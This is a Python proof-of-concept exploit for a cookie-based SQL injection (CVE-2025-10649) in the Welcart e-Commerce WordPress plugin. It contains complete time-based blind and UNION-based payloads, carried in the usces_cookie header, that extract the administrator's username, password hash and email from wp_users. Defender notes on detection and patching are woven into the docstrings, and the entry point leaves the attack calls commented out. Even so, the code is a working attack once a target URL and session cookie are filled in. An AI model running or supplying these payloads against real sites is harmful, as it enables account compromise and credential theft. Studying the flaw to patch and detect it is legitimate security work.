# CVE-2025-10649 - Welcart e-Commerce SQL Injection PoC
# Vulnerability: Cookie-based SQL Injection in Welcart e-Commerce plugin
# Affected versions: <= 2.11.21
# Required privilege: Author-level access or above
import requests
import sys
# Placeholder configuration. Both values are supplied by the operator; nothing in
# this file discovers them. AUTH_COOKIE is the ``name=value`` of a WordPress
# logged-in session, which the page states must be Author-level or higher, so
# exploitation presupposes an already-authenticated account -- audit logs for
# that role are the natural starting point when investigating.
TARGET_URL = "http://target-wordpress-site.com"
AUTH_COOKIE = "wordpress_logged_in_xxxxx=your_auth_cookie_here" # Author-level session cookie (placeholder)
def exploit_sqli(target_url, auth_cookie, injection_payload):
"""
Send a single GET whose ``usces_cookie`` cookie carries ``injection_payload``.

The only request attribute that differs from ordinary traffic is the Cookie
header: ``usces_cookie`` holds the payload verbatim and ``auth_cookie`` makes the
request look like an authenticated session. The User-Agent is a fixed desktop
browser string.

Defender notes:
- Detection: the injection surface is a cookie, not a URL parameter or POST
body, so filters that only inspect query strings and form fields will not see
it. Inspect the ``usces_cookie`` value for SQL syntax (quotes, ``UNION``,
``SLEEP``, ``--``) and correlate with the session cookie that accompanies it.
- Mitigation: run a Welcart version outside the affected range given in the
header (<= 2.11.21); the root-cause fix is parameterising the query that
consumes this cookie value (e.g. ``$wpdb->prepare``).

Args:
target_url: Base URL that is requested.
auth_cookie: ``name=value`` string of the logged-in WordPress cookie.
injection_payload: Text placed unchanged into the ``usces_cookie`` cookie.

Returns:
The ``requests.Response`` object for the GET.
"""
# Payload first, session cookie second, joined as one Cookie header value.
malicious_cookie = f"usces_cookie={injection_payload}; {auth_cookie}"
headers = {
"Cookie": malicious_cookie,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
}
# One plain GET to the base URL; no timeout is set, so a server-side SLEEP
# (see the time-based helper) blocks this call for its full duration.
response = requests.get(target_url, headers=headers)
return response
def extract_data_time_based(target_url, auth_cookie):
"""
Time-based blind probe loop (the PoC's inference technique).

For each position 1..49 and each printable ASCII value 32..126 one request is
sent via ``exploit_sqli``; a wall-clock round trip of at least 2 seconds is
taken as "condition true". The sibling ``extract_data_union_based`` uses the
same transport but a different inference method.

Defender notes:
- Traffic shape: a burst of GETs from one authenticated session whose
``usces_cookie`` values are identical except for two embedded numbers, with a
bimodal latency distribution (fast vs. ~2 s). That pattern is a strong
detection signature in access logs and APM data.
- Impact: the query reads ``wp_users.user_pass`` for ``ID=1``; treat any
confirmed run as credential exposure for that account.

Args:
target_url: Base URL passed through to ``exploit_sqli``.
auth_cookie: Session cookie passed through to ``exploit_sqli``.

Returns:
The characters recovered so far, as a str (may be empty).
"""
extracted = ""
for position in range(1, 50):
for ascii_val in range(32, 127):
# MySQL time-based blind injection payload
# IF condition checks each character of the admin password hash
payload = f"1' AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),{position},1))={ascii_val},SLEEP(2),0)-- -"
# Stdlib import repeated on every iteration; harmless since Python caches modules.
import time
start_time = time.time()
response = exploit_sqli(target_url, auth_cookie, payload)
elapsed = time.time() - start_time
# Wall-clock threshold equal to the SLEEP argument; network latency is not subtracted.
if elapsed >= 2: # If SLEEP triggered, we found the character
extracted += chr(ascii_val)
print(f"[+] Position {position}: {chr(ascii_val)} (Hash so far: {extracted})")
break
else:
break
return extracted
def extract_data_union_based(target_url, auth_cookie):
"""
UNION-based probe: find a column count, then request ``wp_users`` fields.

Step 1 sends payloads with 1..14 ``NULL`` columns and stops at the first HTTP
200. Step 2 sends one more payload selecting ``user_login``, ``user_pass`` and
``user_email`` for ``ID=1`` and prints up to 500 characters of the response body.
Nothing is returned; output goes to stdout only.

Defender notes:
- Traffic shape: consecutive requests whose ``usces_cookie`` differs only by an
incrementing number of ``NULL`` terms, followed by one containing column names
from ``wp_users`` -- an easily matched sequence in access logs.
- Impact: a successful run echoes account credentials (including the password
hash) into the page body, so the affected account should be rotated.
- Mitigation is the same as for ``exploit_sqli``: parameterise the query that
consumes the cookie and upgrade past the affected range.

Args:
target_url: Base URL passed through to ``exploit_sqli``.
auth_cookie: Session cookie passed through to ``exploit_sqli``.
"""
# First determine the number of columns
for cols in range(1, 15):
nulls = ",".join(["NULL"] * cols)
payload = f"1' UNION SELECT {nulls}-- -"
response = exploit_sqli(target_url, auth_cookie, payload)
# A 200 is taken as "column count matched"; no other status is checked.
if response.status_code == 200:
print(f"[+] Number of columns: {cols}")
break
# Extract admin credentials
payload = f"1' UNION SELECT user_login,user_pass,user_email,{','.join(['NULL']*(cols-3))} FROM wp_users WHERE ID=1-- -"
response = exploit_sqli(target_url, auth_cookie, payload)
print(f"[+] Response: {response.text[:500]}")
# Entry point. As written it only prints banners: both extraction calls are
# commented out and must be enabled by hand after TARGET_URL and AUTH_COOKIE
# are set, so importing or running the file as-is sends no requests.
if __name__ == "__main__":
print("[*] CVE-2025-10649 - Welcart e-Commerce SQL Injection PoC")
print("[*] This PoC requires Author-level authenticated access")
# Example usage (uncomment to use):
# extract_data_time_based(TARGET_URL, AUTH_COOKIE)
# extract_data_union_based(TARGET_URL, AUTH_COOKIE)
print("[*] Please configure TARGET_URL and AUTH_COOKIE before running")